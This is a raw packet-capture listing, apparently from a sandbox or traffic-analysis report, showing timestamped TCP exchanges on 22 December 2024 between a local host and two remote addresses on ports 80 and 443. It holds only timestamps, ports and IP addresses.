                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.507524967 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.507596016 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.507644892 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.508357048 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.508467913 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.508519888 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.509191990 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.509314060 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.509361982 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.510025978 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.510080099 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.510164976 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.510885000 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.510921001 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.510938883 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.510961056 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.511766911 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.511883974 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.511929989 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.512579918 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.512707949 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.512763023 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.513453007 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.513505936 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.513586044 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.514246941 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.514296055 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.514358997 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.515084982 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.515127897 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.515197992 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.515247107 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.515933990 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.516043901 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.516050100 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.516088963 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.516815901 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.516859055 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.516904116 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.516948938 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.517647982 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.517692089 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.517736912 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.517786026 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.518487930 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.518532038 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.518577099 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.518625975 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.519357920 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.519404888 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.519480944 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.519527912 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.520195007 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.520301104 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.520347118 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.521070004 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.521147013 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.521198988 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.521914005 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.521982908 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.522032976 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.522742987 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.522880077 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.522936106 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.523591042 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.523695946 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.523746014 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.524457932 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.524558067 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.524607897 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.525273085 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.525382042 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.525434017 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.526132107 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.526233912 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.526287079 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.526995897 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.527045965 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.527091026 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.527831078 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.527882099 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.527899027 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.528218985 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.528661966 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.528774977 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.528826952 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.529525995 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.529643059 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.529695988 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.530375004 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.530488968 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.530544043 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.531232119 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.531301975 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.531328917 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.531383038 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.532089949 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.532198906 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.532279015 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.532928944 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.533093929 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.533166885 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.533765078 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.533874989 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.533950090 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.534627914 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.534733057 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.534806013 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.535485983 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.535612106 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.535685062 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.536359072 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.536475897 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.536551952 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.537158012 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.537270069 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.537343025 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.538018942 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.538129091 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.538203001 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.538861036 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.538973093 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.539045095 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.539726973 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.539838076 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.539911985 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.540566921 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.540676117 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.540750980 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.541431904 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.541553974 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.541632891 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.542279959 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.542457104 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.542534113 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.543174028 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.543271065 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.543346882 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.543987036 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.544076920 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.544121027 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.544202089 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.544841051 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.544936895 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.545017958 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.545725107 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.545778036 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.545860052 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.546510935 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.546612024 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.546689034 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.547332048 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.548142910 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.600864887 CET44349814172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.600922108 CET49814443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.602849960 CET49814443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.602859020 CET44349814172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.603080988 CET44349814172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.604484081 CET49814443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.604501963 CET49814443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.604545116 CET44349814172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.695076942 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.695209026 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.695286036 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.695498943 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.695552111 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.696103096 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.696155071 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.696259975 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.696326017 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.697007895 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.697149992 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.697215080 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.697844982 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.697993040 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.698049068 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.698693037 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.698869944 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.698930025 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.699569941 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.699665070 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.699726105 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.700377941 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.700521946 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.700582981 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.701237917 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.701370955 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.701457977 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.702100039 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.702229977 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.702310085 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.702944040 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.703080893 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.703160048 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.703794003 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.703917027 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.704001904 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.704659939 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.704771042 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.704849958 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.705519915 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.705620050 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.705699921 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.706322908 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.706435919 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.706512928 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.707160950 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.707285881 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.707362890 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.708055973 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.708159924 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.708240986 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.708889008 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.709083080 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.709161043 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.709752083 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.709882021 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.709956884 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.710588932 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.710717916 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.710794926 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.711452961 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.711505890 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.711581945 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.712296009 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.712435961 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.712516069 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.713131905 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.713249922 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.713326931 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.714004040 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.714205980 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.714284897 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.714916945 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.714979887 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.715053082 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.715886116 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.715970039 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.716041088 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.716486931 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.716610909 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.716686010 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.717335939 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.717442036 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.717514992 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.718197107 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.718301058 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.718372107 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.719079971 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.719189882 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.719264030 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.719894886 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.720042944 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.720102072 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.720737934 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.720845938 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.720916033 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.721589088 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.721705914 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.721776962 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.722438097 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.722593069 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.722664118 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.723288059 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.723401070 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.723473072 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.724159002 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.724271059 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.724343061 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.724981070 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.725076914 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.725147009 CET4980480192.168.2.431.41.244.11
